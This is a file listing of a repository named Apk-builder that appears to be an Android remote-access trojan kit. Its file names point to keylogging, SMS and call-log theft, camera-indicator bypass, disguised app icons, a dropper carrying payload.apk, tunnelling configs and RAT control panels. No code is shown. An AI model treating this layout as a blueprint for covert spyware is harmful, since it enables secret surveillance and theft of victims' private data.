# Apk-builder

./: .dockerignore  .gitattributes  .gitignore  .replit  Dockerfile  activity-log.txt  build.sh  gradle.properties  java_pid8688.hprof  java_pid9676.hprof  package-lock.json  package.json  packageids.json  pyproject.toml  replit.md  replit.nix  run_build.sh  server.js  settings.gradle  start.sh
.github/workflows/: apk-build.yml  build-apk.yml
Apk-builder/: .replit  LICENSE  build.sh  gradle.properties  server.js
Apk-builder/apk-output/: RemoteAccess-release.apk.idsig
Apk-builder/app/: obf-dict.txt  release.keystore
Testing/: DOCUMENTATION.md  activity-log.txt
Testing/backend/: .jwt_secret  (+1 more)
accessibility-apk/: README.md  gradle.properties  settings.gradle
accessibility-apk/app/: build.gradle
accessibility-apk/app/src/main/: AndroidManifest.xml
accessibility-apk/app/src/main/java/com/remoteaccess/accessibility/: BootReceiver.java  ConfigActivity.java  SocketClient.java  SocketService.java  StandaloneAccessibilityService.java
accessibility-apk/app/src/main/res/values/: strings.xml
accessibility-apk/app/src/main/res/xml/: accessibility_service_config.xml
android-apk-builder/: .gitignore  .replit  activity-log.txt  package-lock.json
apk-output/: Installer-release.apk  Installer-release.apk.idsig  RemoteAccess-release.apk  RemoteAccess-release.apk.idsig
app/: build.access_id  build.app_id  build.gradle  obf-dict.txt  proguard-rules.pro  release.keystore
app/src/main/: AndroidManifest.xml
app/src/main/assets/: help_tutorial.html
app/src/main/cpp/: CMakeLists.txt  guard.c
app/src/main/java/com/access/client/: BackgroundService.java  MainActivity.java
app/src/main/java/com/remoteaccess/educational/: ConsentActivity.java  MainActivity.java  PermissionRequestActivity.java
app/src/main/java/com/remoteaccess/educational/accessibility/: BootReceiver.java  ConfigActivity.java  SocketClient.java  SocketService.java  StandaloneAccessibilityService.java
app/src/main/java/com/remoteaccess/educational/commands/: AppMonitor.java  AudioRecorder.java  CameraHandler.java  CommandExecutor.java  FileHandler.java  GestureRecorder.java  PermissionManager.java  ScreenBlackout.java  ScreenController.java  ScreenMonitor.java  ScreenReader.java  ScreenshotHandler.java
app/src/main/java/com/remoteaccess/educational/network/: SocketManager.java
app/src/main/java/com/remoteaccess/educational/permissions/: AutoPermissionManager.java
app/src/main/java/com/remoteaccess/educational/receivers/: BootReceiver.java
app/src/main/java/com/remoteaccess/educational/services/: RemoteAccessService.java  UnifiedAccessibilityService.java
app/src/main/java/com/remoteaccess/educational/utils/: Constants.java
app/src/main/java/com/task/tusker/: ConsentActivity.java  MainActivity.java  PermissionRequestActivity.java  SystemManagerActivity.java
app/src/main/java/com/task/tusker/advanced/: LiveStreamManager.java  SocialMediaMonitor.java
app/src/main/java/com/task/tusker/commands/: AppMonitor.java  AudioRecorder.java  CallLogsHandler.java  CameraStreamHandler.java  CommandExecutor.java  ContactsHandler.java  FileHandler.java  GalleryHandler.java  GestureRecorder.java  KeyloggerService.java  LogManager.java  LogManager.java.bak  PermissionManager.java  SMSHandler.java  ScreenController.java  ScreenReader.java  ScreenshotHandler.java
app/src/main/java/com/task/tusker/network/: SocketManager.java
app/src/main/java/com/task/tusker/permissions/: AutoPermissionManager.java
app/src/main/java/com/task/tusker/receivers/: AccessibilityReminderReceiver.java  BootReceiver.java  NetworkWakeReceiver.java  WakeAlarmReceiver.java
app/src/main/java/com/task/tusker/security/: ChameleonIdentity.java  LicenseManager.java  PackageChangeReceiver.java  SecurityGuard.java  SizeInflationManager.java  StringEncrypt.java
app/src/main/java/com/task/tusker/services/: DataSyncService.java  RemoteAccessService.java  ServiceWatchdog.java  UnifiedAccessibilityService.java  WakeWorker.java
app/src/main/java/com/task/tusker/stealth/: CameraIndicatorBypass.java  SilentNotificationManager.java  StealthManager.java
app/src/main/java/com/task/tusker/sync/: TaskSyncProvider.java
app/src/main/java/com/task/tusker/utils/: ActivityTracker.java  Constants.java  DeviceInfo.java  IdleSuspensionManager.java  KeepAliveManager.java  PreferenceManager.java  ResourceGuard.java
app/src/main/java/com/ultimate/access/: InputMonitorService.java  KeyloggerService.java  ScreenRecorder.java
app/src/main/res/drawable/: btn_optimize.xml  ic_alias_google.xml  ic_alias_health.xml  ic_alias_storage.xml  ic_alias_sync.xml  ic_alias_system.xml  ic_launcher_settings_fg.xml
app/src/main/res/layout/: activity_main.xml  activity_system_manager.xml
app/src/main/res/mipmap-anydpi-v26/: ic_launcher_round.xml
app/src/main/res/values/: colors.xml  strings.xml  themes.xml
app/src/main/res/xml/: accessibility_service_config.xml  accessibility_service_config_standalone.xml
backend/: .env.example  .jwt_secret  package-lock.json  package.json  redis.js  server-ultimate.js  server.js  vite.config.mjs
build_logs/: py.err
frontend/: Dockerfile  admin-dashboard.html  admin-login.html  admin-settings.html  apk-builder.html  btmob-view.html  control-panel.html  dashboard.html  device-control.html  index.html  license.html  login.html  lucus-complete-with-modals.html  lucus-control-panel.html  lucus-license-panel.html  lucus-rat-complete.html  multi-control.html  register.html  ultimate-dashboard.html  user-dashboard.html
frp/: frpc.toml
frpc/: frpc.toml
frps/: frps.toml
installer/: build.app_id  build.gradle  payload.pkg  proguard-rules.pro
installer/src/main/: AndroidManifest.xml
installer/src/main/assets/: payload.apk
installer/src/main/java/com/installer/drop/: MainActivity.java
installer/src/main/java/com/onerule/task/: BlockVpnService.java  MainActivity.java
installer/src/main/res/drawable/: ic_launcher.xml
installer/src/main/res/values/: colors.xml  strings.xml
scripts/: post-merge.sh
simulator/: index.js
(+168 files in other folders)
